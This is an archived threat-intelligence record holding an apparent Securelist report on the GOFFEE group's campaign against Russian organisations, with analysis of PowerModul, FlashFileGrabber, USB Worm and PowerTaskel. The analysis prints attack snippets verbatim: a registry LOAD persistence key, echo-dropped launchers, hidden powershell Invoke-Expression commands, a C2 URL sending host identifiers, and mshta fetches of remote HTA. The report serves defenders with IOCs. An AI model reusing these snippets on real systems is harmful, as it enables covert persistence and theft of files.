{
	"id": "437da3cf-cbda-4f6a-be8d-c634e056d811",
	"created_at": "2026-04-06T00:21:21.66704Z",
	"updated_at": "2026-04-10T03:33:30.094341Z",
	"deleted_at": null,
	"sha1_hash": "b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca",
	"title": "GOFFEE continues to attack organizations in Russia",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1395206,
	"plain_text": "GOFFEE continues to attack organizations in Russia\r\nBy Oleg Kupreev\r\nPublished: 2025-04-10 · Archived: 2026-04-02 11:22:41 UTC\r\nGOFFEE is a threat actor that first came to our attention in early 2022. Since then, we have observed malicious\r\nactivities targeting exclusively entities located in the Russian Federation, leveraging spear phishing emails with a\r\nmalicious attachment. Starting in May 2022 and up until the summer of 2023, GOFFEE deployed a modified Owowa\r\n(a malicious IIS module) in their attacks. As of 2024, GOFFEE started to deploy patched malicious instances of\r\nexplorer.exe via spear phishing.\r\nDuring the second half of 2024, GOFFEE continued to launch targeted attacks against organizations in Russia,\r\nutilizing PowerTaskel, a non-public Mythic agent written in PowerShell, and introducing a new implant that we\r\ndubbed “PowerModul”. The targeted sectors included media and telecommunications, construction, government\r\nentities, and energy companies.\r\nThis report in a nutshell:\r\nGOFFEE updated distribution schemes.\r\nA previously undescribed implant dubbed PowerModul was introduced.\r\nGOFFEE is increasingly abandoning the use of PowerTaskel in favor of a binary Mythic agent for lateral\r\nmovement.\r\nFor more information, please contact: intelreports@kaspersky.com\r\nTechnical details\r\nInitial infection\r\nCurrently, several infection schemes are being used at the same time. The starting point is typically a phishing email\r\nwith a malicious attachment, but the schemes diverge slightly from there. We will review the two that were relevant at\r\nthe time of the research.\r\nThe first infection scheme uses a RAR archive with an executable file masquerading as a document. In some cases,\r\nthe file name uses a double extension, such as “.pdf.exe” or “.doc.exe”. 
When the user clicks the executable file, a\r\ndecoy document is downloaded from the C2 and opened, while malicious activity is carried out in parallel.\r\nhttps://securelist.com/goffee-apt-new-attacks/116139/\r\nPage 1 of 23\n\nExample of decoy document\r\nThe file itself is a Windows system file (explorer.exe or xpsrchvw.exe), with part of its code patched with a\r\nmalicious shellcode. The shellcode is similar to what we saw in earlier attacks, but in addition contains an\r\nobfuscated Mythic agent, which immediately begins communicating with the command-and-control (C2) server.\r\nMalware execution flow v1\r\nIn the second case, the RAR archive contains a Microsoft Office document with a macro that serves as a dropper.\r\nMalware execution flow v2\r\nMalicious document with a macro\r\nWhen a document is opened, scrambled text and a warning image with the message, “This document was created in\r\nan earlier version of Microsoft Office Word. For Microsoft Office Word to display the contents correctly, click\r\n‘Enable Content’”, are shown. Clicking “Enable Content” activates a macro that hides the warning image and\r\nrestores the text through a simple character replacement operation. 
Additionally, the macro creates two files in the\r\nuser’s current folder: an HTA and a PowerShell file, and writes the HTA into the registry using the “LOAD” registry\r\nvalue of the “HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows” registry key.\r\nHKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows\r\n\"LOAD\"=\"C:\\Users\\\u003cUSER_NAME\u003e\\UserCache.ini.hta\"\r\nAlthough the macro itself does not start anything or create new processes, the programs listed in the “LOAD” value\r\nof the registry key are run automatically for the currently logged-on user.\r\nUserCache.ini.hta content\r\nThe malicious HTA runs a PowerShell script (PowerModul), but not directly. Instead, it first uses cmd.exe and\r\noutput redirection to drop a JavaScript file named “UserCacheHelper.lnk.js” onto the disk, and then executes it.\r\nOnly then does the dropped JavaScript run PowerModul:\r\ncmd.exe /c if not exist \"C:\\Users\\user\\UserCacheHelper.lnk.js\" echo var objService =\r\nGetObject(\"winmgmts:\\\\\\\\.\\\\root\\\\cimv2\");var objStartup = objService.Get(\"Win32_ProcessStartup\");var\r\nobjConfig = objStartup.SpawnInstance_();objConfig.ShowWindow = 0;var processClass =\r\nobjService.Get(\"Win32_Process\");var command = \"powershell.exe -c \\\"$raw= Get-Content\r\nC:\\\\Users\\\\user\\\\UserCache.ini;Invoke-Expression $raw\\\"\";var result = processClass.Create(command, null,\r\nobjConfig, 0); \u003e C:\\Users\\user\\UserCacheHelper.lnk.js\r\nIt is worth noting that “UserCache.ini.hta” and “UserCacheHelper.lnk.js” contain strings with full paths to the files,\r\nincluding the local user’s name, instead of environment variables. 
As a result, the file hashes, as well as the file\r\nsizes, will vary depending on the current user’s name.\r\nUserCacheHelper.lnk.js content\r\nThe “UserCacheHelper.lnk.js” file launches a PowerShell file named “UserCache.ini”, dropped by the initial macro.\r\nThis file contains the encoded PowerModul script.\r\nPowerModul\r\nMD5 60A53D2C653991F086C4E6663D652CF2\r\nSHA1 636814C31B78DD291049029A655238D7ADAFF041\r\nSHA256 BE1D0FAF1C253FAACBA1059971B01D1D646256D7B2E557DA55ED059542AFDBCD\r\nFile type PowerShell\r\nFile size 6.66 KB\r\nFile name UserCache.ini\r\nPowerModul is a PowerShell script capable of receiving and executing additional PowerShell scripts from the C2\r\nserver. The first instances of this implant’s usage were detected at the beginning of 2024. Initially, it was used to\r\ndownload and launch the PowerTaskel implant, and was considered a relatively minor component for launching\r\nPowerTaskel. However, its use of a unique protocol, distinct payload types, and a C2 server different from\r\nPowerTaskel’s led us to classify it as a separate family.\r\nUserCache.ini content\r\nIn the scheme being described, the PowerModul code is embedded in the “UserCache.ini” file as a Base64-encoded\r\nstring. The beginning and end of the decoded script are shown in the images below, while the middle section\r\ncontains a copy of the HTA file, as well as code responsible for dropping the HTA file onto the disk, writing it to the\r\nregistry, and hiding the file by changing its attributes to “Hidden”. 
Essentially, this code replicates part of the\r\nfunctionality of the VBA macro found in the Word document, except for file hiding, which was not implemented in\r\nVBA.\r\nBeginning of PowerModul\r\nEnd of PowerModul\r\nWhen accessing the C2, PowerModul appends an infected system identifier string to the C2 URL, consisting of the\r\ncomputer name, username, and disk serial number, separated with underscores:\r\nhxxp://62.113.114[.]117/api/texts/{computer_name}_{username}_{serial_number}\r\nThe response from the C2 is in XML format, complete with scripts encoded in Base64:\r\nHTTP/1.1 200 OK\r\nServer: nginx/1.18.0\r\nContent-Type: text/plain\r\nContent-Length: 35373\r\nConnection: keep-alive\r\n\u003cConfigs\u003e\r\n  \u003cConfig\u003e\r\n\u003cModule\u003eZnVuY3Rpb24gQ3JlYXRlVkJTRmlsZSgkYkJkcmxzRCwgJGlMc1FybVQsIC....==\u003c/Module\u003e\r\n\u003cCountRuns\u003e250\u003c/CountRuns\u003e\r\n\u003cInterval\u003e1\u003c/Interval\u003e\r\n  \u003c/Config\u003e\r\n  \u003cConfig\u003e\r\n\u003cModule\u003eZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9I...\u003c/Module\u003e\r\nThere is an additional, previously undescribed function in PowerModul, named “OfflineWorker()”. It decodes a\r\npredefined string and executes its contents. In the instance shown in the screenshots above, the string to be decoded\r\nis empty, and therefore, nothing is executed. 
However, we have observed cases where the string contained content.\r\nAn example of the OfflineWorker() function containing the FlashFileGrabber data stealing tool code is shown\r\nbelow:\r\nfunction OfflineWorker() {\r\ntry{\r\n     $___offlineFlash =\r\n'ZnVuY3Rpb24gUnVuKCl7DQokaWQgPSBnZXQtcmFuZG9tDQokY29kZSA9IE…….=';\r\n     if($___offlineFlash -ne ''){\r\n         $___flashOfflineDecoded = FromBase64 $___offlineFlash;\r\n         Invoke-Expression($___flashOfflineDecoded);\r\n     }\r\n}\r\ncatch{}\r\n}\r\nThe payloads used by PowerModul include the PowerTaskel, FlashFileGrabber, and USB Worm tools.\r\nFlashFileGrabber\r\nAs its name suggests, FlashFileGrabber is designed to steal files from removable media, such as flash drives. We\r\nhave identified two variants: FlashFileGrabber and FlashFileGrabberOffline.\r\nFlashFileGrabberOffline main routine\r\nFlashFileGrabberOffline searches removable media for files with specific extensions, and when found, copies them\r\nto the local disk. To accomplish this, it creates a series of subdirectories in the TEMP folder, following the template\r\n“%TEMP%\\CacheStore\\connect\\\u003cVolumeSerialNumber\u003e\\”. The folder names “CacheStore” and “connect” are\r\nhardcoded within the script. 
Examples of such paths are provided below:\r\n%TEMP%\\CacheStore\\connect\\62431103\\2024\\some.pdf\r\n%TEMP%\\CacheStore\\connect\\62431103\\Documents\\some.docx\r\n%TEMP%\\CacheStore\\connect\\62431103\\attachment.jpg\r\n%TEMP%\\CacheStore\\connect\\6c1d1372\\Print\\resume.docx\r\nAdditionally, a file named “ftree.db” is created at the path specified in the template, which stores metadata for the\r\ncopied files, including the full path to the original file, its size, and dates of last access and modification.\r\nFurthermore, in the “%AppData%” folder, the “internal_profiles.db” file is created, storing the MD5 sums of the\r\naforementioned metadata. This allows the malware to avoid copying the same files more than once:\r\n%TEMP%\\CacheStore\\connect\\\u003cVolumeSerialNumber\u003e\\ftree.db\r\n%AppData%\\internal_profiles.db\r\nThe list of file extensions of interest is as follows:\r\n.7z .kml .rar\r\n.conf .log .rtf\r\n.csv .lrf .scr\r\n.doc .mdb .thm\r\n.docx .ods .txt\r\n.dwg .odt .xlm\r\n.heic .ovpn .xls\r\n.hgt .pdf .xlsm\r\n.html .png .xlsx\r\n.jpeg .pptx .xml\r\n.jpg .ps1 .zip\r\nFlashFileGrabber largely duplicates the functionality of FlashFileGrabberOffline, but with one key difference: it is\r\ncapable of sending files to the C2 server.\r\nFlashFileGrabber’s routines\r\nUSB Worm\r\nUSB Worm is capable of infecting removable media with a copy of PowerModul. To achieve this, the worm\r\nrenames the files on the removable disk with a random name, retaining their original extension, and assigns them\r\nthe “Hidden” file attribute. 
The “UserCache.ini” file, which contains PowerModul, is then copied to the folder with\r\nthe original file.\r\nUSB Worm main routine\r\nAdditionally, the worm creates hidden VBS and batch files to launch PowerModul and open a decoy document.\r\nCreateVBSFile() and CreateBatFile() functions\r\nSet WshShell = WScript.CreateObject(\"WScript.Shell\")\r\nWshShell.Run Chr(34) \u0026 \".\\zermndzg.bat\" \u0026 Chr(34), 0, False\r\nWshShell.Run Chr(34) \u0026 \".\\zermndzg.docx\" \u0026 Chr(34), 1, False\r\nSet WshShell = Nothing\r\nExample of the contents of a malicious VBS\r\npowershell -exec bypass -windowstyle hidden -nop -c \"$raw= [io.file]::ReadAllText(\"\"\".\\UserCache.ini\"\"\");\r\niex $raw;\"\r\nExample of the contents of a malicious batch file\r\nA shortcut is also created with the original name of the decoy document, which, when launched, executes the VBS\r\nfile.\r\nCreateShortcutForFile() function\r\nTo disguise the shortcut, the worm assigns an icon from the shell32.dll library, depending on the extension of the\r\noriginal file. The worm limits the number of documents replaced with shortcuts to five, selecting only the most\r\nrecently accessed files by sorting them according to their LastAccessTime attribute.\r\nSystem infection scheme via removable media\r\nPowerTaskel\r\nWe have dubbed the non-public PowerShell Mythic agent delivered via a mail-based infection chain since early\r\n2023 PowerTaskel. This implant possesses only two primary capabilities: sending information about the targeted\r\nenvironment to a C2 server in the form of a “checkin” message, and executing arbitrary PowerShell scripts and\r\ncommands received from the C2 server as “tasks” in response to “get_tasking” requests from the implant. 
The\r\nrequest payloads are PowerShell objects that are serialized to XML, encoded using XOR with a sample-specific 1-\r\nbyte key, and then converted to Base64.\r\nBased on the naming and ordering of the configuration parameters, it is likely that PowerTaskel is derived from the\r\nopen-source Medusa Mythic agent, which was originally written in Python.\r\nComparison of Medusa and PowerTaskel configuration code\r\nComparison of Medusa and PowerTaskel “checkin” function code\r\nPowerTaskel is a fully functional agent capable of executing commands and PowerShell scripts, which expand its\r\ncapabilities to downloading and uploading files, running processes, etc. However, its functionality is often\r\ninsufficient due to specific aspects of PowerShell usage, prompting the group to switch to a custom binary Mythic\r\nagent. To achieve this, PowerTaskel loads the Mythic agent from the C2 server, injects it into its own process\r\nmemory, and runs it in a separate thread. In this scenario, the Mythic agent is present as a self-configuring x32/x64\r\nshellcode. The method of injecting and loading the Mythic agent shellcode is described in more detail in the\r\n“Lateral Movement” section.\r\nIn at least one instance, PowerTaskel received a script containing a FolderFileGrabber component as a task.\r\nFolderFileGrabber largely replicates the functionality of FlashFileGrabber, with one key difference: it can grab files\r\nfrom remote systems via a hardcoded network path using the SMB protocol. The PowerShell cmdlet “New-SmbMapping” is used to access remote system resources, enabling successful retrieval of the desired files.\r\nLateral movement\r\nFollowing system infection, if the user account permissions allow it, PowerTaskel performs several tasks to elevate\r\nits privileges to the System level. To achieve this, PowerTaskel utilizes the PsExec utility, which is part of the\r\nSysinternals suite. 
The PsExec utility is dropped into the current directory where PowerTaskel is located and is used\r\nto execute mshta.exe with system privileges, passing a URL as an argument.\r\nThe images below depict two tasks that PowerTaskel executes with its C2 server. The first task checks for the\r\npresence of the file “ntuser.exe” in the %ProgramData% directory, and if it is not found, downloads it from the C2\r\nserver. The second task runs mshta.exe via ntuser.exe, which is actually a renamed PsExec utility.\r\nGetting “ntuser.exe”\r\nThe “ntuser.exe” executable running “mshta.exe”\r\nThe next image illustrates an example of the execution flow of various scripts and commands started with the\r\nprivilege elevation procedure. The executable file “1cv9.exe” is a renamed PsExec utility, and the argument “-s”\r\nspecifies that the process it launches should run under the System account. The launched program “mshta.exe”\r\naccepts a URL as an argument, which points to an HTA file containing malicious, obfuscated JScript. The HTA file\r\nis cached and saved to the InetCache folder. This JScript creates two files, “desktop.js” and “user.txt”, on the disk\r\nusing the “echo” console command with output redirection to a file, and then executes desktop.js via cscript.exe.\r\nThe desktop.js file, in turn, launches the interpreter with a script on the command line, which reads the contents of\r\nuser.txt and executes it. As evident from the contents passed to the “echo” command, user.txt is another PowerShell\r\nscript whose task is to extract a payload from a hardcoded address and execute it. 
In this case, the payload is\r\nPowerTaskel, which now runs with the elevated privileges.\r\nExample of execution flow on an infected system\r\nOnce launched, PowerTaskel interacts with its C2 server and executes standard commands to gather information\r\nabout the system and environment. Notably, the launch of csc.exe (Visual C# Command Line Compiler) indicates\r\nthat PowerTaskel has received a task to load a shellcode, which it accomplishes using an auxiliary DLL. The\r\nprimary function of this DLL is to copy the shellcode into allocated memory. In our case, the shellcode is self-configuring code for the binary Mythic agent.\r\nThe final line of the execution flow (“hxxp://192.168.1[.]2:5985/wsman”) reveals a call to the WinRM (Microsoft\r\nWindows Remote Management) service, located on a remote host on the local network, via the loaded Mythic\r\nagent. A specific User-Agent header value, “Ruby WinRM Client”, is used to access the WinRM service.\r\nHTTP header for WinRM request\r\nThe WinRM service is actively utilized by GOFFEE for network distribution purposes. Typically, this involves\r\nlaunching the mshta.exe utility on the remote host with a URL as an argument. 
The following examples illustrate\r\nthe execution chains observed on remote hosts:\r\nwmiprvse.exe -secured -Embedding\r\n-\u003e cmd.exe /C mshta.exe https://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nwsmprovhost.exe\r\n-\u003e mshta.exe https://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nwmiprvse.exe -secured -Embedding\r\n-\u003e cmd.exe /Q /c powershell.exe mshta.exe\r\nhttps://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nwmiprvse.exe -secured -Embedding\r\n-\u003e powershell.exe /C mshta.exe https://\u003cdomain\u003e.com/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e/\u003cword\u003e.hta\r\nRecently, we have observed that GOFFEE is increasingly abandoning the use of PowerTaskel in favor of the binary\r\nMythic agent during lateral movement.\r\nMythic agent HTA\r\nMD5 615BD8D70D234F16FC791DCE2FC5BCF0\r\nSHA1 EF14D5B97E093AABE82C4A1720789A7CF1045F6D\r\nSHA256 AFC7302D0BD55CFC603FDAF58F5483B0CC00D354274F379C75CFA17F6BA6F97D\r\nFile type Polyglot (HTML Application)\r\nFile size 165.32 KB\r\nFile name duplicate.hta\r\nThe mshta.exe utility is still employed to launch the binary Mythic agent, with a URL passed as an argument.\r\nHowever, the payload contents for the passed URL differ from the traditional HTA format. It is relatively large,\r\napproximately 180 kilobytes, and is characterized as a polyglot file, which is a type of file that can be validly\r\ninterpreted in multiple formats. The shellcode containing the Mythic agent is located at the beginning of the file and\r\noccupies approximately 80% of its size. 
It is followed by two Base64-encoded PowerShell scripts, separated by a\r\nregular line break, and finally, the HTA file itself.\r\nPolyglot payload\r\nWhen the mshta.exe utility downloads the aforementioned payload, it interprets it as an HTA file and transfers\r\ncontrol to an obfuscated JScript embedded within the HTA section of the polyglot file. The script first determines\r\nthe argument used to launch the mshta.exe utility, whether it was a URL or a path to a local file. If a URL was used\r\nas the argument, the script searches for the original HTA file in the InetCache folder, where the system cached the\r\nHTA file during download. To do this, the script iterates through all files in the cache folder and checks their\r\ncontents for the presence of a specific magic string.\r\nDeobfuscated JScript from the HTA section of the payload\r\nIf an HTA file is found on the disk, the script drops two files, “settings.js” and “settings.ps1”, using the “echo”\r\ncommand, and then runs settings.js with additional command-line arguments. The script then sets a timer for 10\r\nseconds, after which the dropped files will be deleted.\r\nDeobfuscated “settings.js”\r\nThe running settings.js script accepts three command-line arguments: the path to powershell.exe, the path to the\r\nHTA file, and the string “Shell.Application”. 
These received arguments are used to populate a PowerShell script, the\r\ncontents of which are then passed to the powershell.exe command line.\r\npowershell.exe -c \"$INbqDKHp = \\\"C:\\\\\\\\Users\\\\\\\\\r\n[username]\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\INetCache\\\\\\\\IE\\\\\\\\duplicate````[1````].hta\\\";$OdfUfjp\r\n= get-content $env:USERPROFILE\\\\settings.ps1;$KWfWXqek=1;Invoke-Expression\r\n$OdfUfjp;$KWfWXqek=2;Invoke-Expression $OdfUfjp;$KWfWXqek=3;Invoke-Expression $OdfUfjp;\"\r\nThe script passed to the PowerShell interpreter declares two variables: “$INbqDKHp”, which stores the path to the\r\nHTA file, and “$KWfWXqek”, a counter. The script then reads the contents of “settings.ps1” and executes it three\r\ntimes, passing the path to the HTA file and the counter as arguments, and incrementing the value of the\r\n“$KWfWXqek” variable by 1 each time.\r\nDeobfuscated “settings.ps1”\r\nDuring each execution, the “settings.ps1” script reads the contents of the HTA file, splits it into lines, and identifies\r\nBase64-encoded scripts. To detect these scripts, it first locates the line containing the HTA application tag by\r\nsearching for the substring “\u003cHTA:APPLICATION”. The three lines preceding this tag contain Base64-encoded\r\nscripts. Depending on the value of the “$KWfWXqek” counter, the script executes the corresponding Base64-\r\nencoded script.\r\nThe first two scripts are used to declare auxiliary functions, including compiling a helper DLL, which is necessary\r\nfor executing the shellcode. 
The third script is responsible for allocating memory, loading the shellcode from the\r\nHTA file (whose path is retrieved from the previously defined “$INbqDKHp” variable), and transferring control to\r\nthe loaded shellcode, which is the self-configuring code of the Mythic agent.\r\nVictims\r\nAccording to our telemetry, the identified targets of the malicious activities described in this article are located in\r\nRussia, with observed activity spanning from July 2024 to December 2024. The targeted industries are diverse,\r\nencompassing organizations in the mass media and telecommunications sectors, construction, government entities,\r\nand energy companies.\r\nAttribution\r\nIn this campaign, the attacker utilized PowerTaskel, which had previously been linked to the GOFFEE group.\r\nAdditionally, HTA files and various scripts were employed in the infection chain.\r\nThe malicious executable attached to the spear phishing email is a patched version of explorer.exe, similar to what\r\nwe observed in GOFFEE’s attacks earlier in 2024, and contains shellcode that is very similar to the one previously\r\nused by GOFFEE.\r\nConsidering the same victimology, we can attribute this campaign to GOFFEE with a high degree of confidence.\r\nConclusions\r\nDespite using similar tools and techniques, GOFFEE introduced several notable changes in this campaign.\r\nFor the first time, they employed Word documents with malicious VBA scripts for initial infection. Additionally,\r\nGOFFEE utilized a new PowerShell script downloader, PowerModul, to download PowerTaskel, FlashFileGrabber,\r\nand USB Worm. 
They also began using the binary Mythic agent, and likely developed their own implementations in\r\nPowerShell and C.\r\nWhile GOFFEE continues to refine their existing tools and introduce new ones, these changes are not significant\r\nenough for their activity to be confused with that of another actor.\r\nSource: https://securelist.com/goffee-apt-new-attacks/116139/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/goffee-apt-new-attacks/116139/"
	],
	"report_names": [
		"116139"
	],
	"threat_actors": [
		{
			"id": "120b98af-cc15-468d-ae91-52d5af9216e4",
			"created_at": "2025-05-29T02:00:03.189197Z",
			"updated_at": "2026-04-10T02:00:03.84415Z",
			"deleted_at": null,
			"main_name": "GOFFEE",
			"aliases": [],
			"source_name": "MISPGALAXY:GOFFEE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434881,
	"ts_updated_at": 1775792010,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca.pdf",
		"text": "https://archive.orkl.eu/b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca.txt",
		"img": "https://archive.orkl.eu/b5909a0e0f4d20ff2b6ff59e1a098b7619a114ca.jpg"
	}
}